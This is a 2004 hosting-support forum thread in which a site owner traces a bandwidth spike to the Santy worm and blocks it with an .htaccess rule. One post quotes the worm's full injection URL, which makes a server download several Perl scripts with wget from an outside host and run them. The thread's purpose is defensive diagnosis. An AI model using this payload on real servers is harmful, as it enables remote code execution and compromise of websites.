2WDHost.com

by **Andrei P.** » Mon Dec 27, 2004 3:58 am

In December the number of my daily visitors for my website dropped from 1000 to 700. My daily bandwidth usage is around ~100MB, so 3000MB / month.

Today I logged in to check my stats, and what do I see?
25 Dec 2004 - 425 visitors - 868.54 MB

And the stats for yesterday (Sunday) counted 1243.39 MB!

So there's something fishy going on here, maybe some exploit on my website that someone is using... I only have a tad until I get to my bandwidth limit, so I'm somewhat desperate.

If anyone has any ideas...

by **2WDHost.com** » Mon Dec 27, 2004 4:02 am

Hi Andrei.

We are looking into the stats on your account and will update you shortly.

Thank you for this request.

by **2WDHost.com** » Mon Dec 27, 2004 5:47 am

Andrei,

We've found that the most bandwidth for the past 2 days on your site has been used by accessing the http://www.geekpedia.com/ prog_ttrls_list.php/ dir .

There is a huge amount of hits for this dir, while visitors amount is much lower, so we are looking for what IPs for the past 2 days hits amount was the biggest for the mentioned dir.

We will update you with the results shortly.

Thank you.

by **Andrei P.** » Mon Dec 27, 2004 6:09 am

Hi 2WDH,

Thank you for your prompt response.

I also looked in the stats (AWStats, Webalizer) for an IP that did a big amount of traffic, however I didn't find any that made traffic of over 100 MB.

by **2WDHost.com** » Mon Dec 27, 2004 6:13 am

Andrei,

You are correct, and there are multiple IPs "crawling" your pages and generating such amount of traffic.

However we've found that the goal of those crawlers is to try to inject some code through your pages to the server.

We will contact you in IM to discuss it to speedup the process.

Thank you.

by **2WDHost.com** » Mon Dec 27, 2004 6:17 am

Andrei,

Could you please logon to MSN now to discuss the issue ASAP?

Looking forward for your reply.

Thank you.

by **Andrei P.** » Mon Dec 27, 2004 7:24 am

Note for others that may have the same problem:

I discussed with 2WDH on IM and he discovered that the problem was the new "Santy" worm.

Currently we agreed to ban "wget", which is found in the URL that the worm uses, attempting to inject code in the pages (in my case):

/prog_ttrls_list.php/reviews_list.php?PHPSESSID=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt

VisualCoders was just an infected site, but there are many others.

Currently I'm trying to find a solution for banning "wget" (using .htaccess) and I'll post it here as soon as I find it.

by **Andrei P.** » Mon Dec 27, 2004 8:27 am

The most popular solution I've found is using the following in .htaccess:

Code: Select all: SetEnvIfNoCase User-Agent ".*lwp.*" spambot=1 <Limit GET POST PUT> Order allow,deny deny from env=spambot allow from all </Limit>

I've tried this, yet I'm not sure if it works.

by **Andrei P.** » Tue Dec 28, 2004 4:17 am

Well, it seems like the problem was fixed by using the lines above. The traffic is getting back to normal:

Thank you for your support, 2WDH and Happy New Year!

by **dryink** » Thu May 26, 2005 7:01 pm

A very similiar thing has just occured to me iwth my bandwidth usage...I'm not sure what the cause of the sudden jump is...perhaps the same thing

by **2WDHost.com** » Fri May 27, 2005 5:08 am

Hi Dryink.

Could you please check your logs for the wget line occurance to determine if that's the same issue, and, if it is, perform the actions discussed in this thread?

Thank you for using our services.

2WDHost.com

Bandwidth usage boom, from 100 MB to 1200MB / day

Bandwidth usage boom, from 100 MB to 1200MB / day

Who is online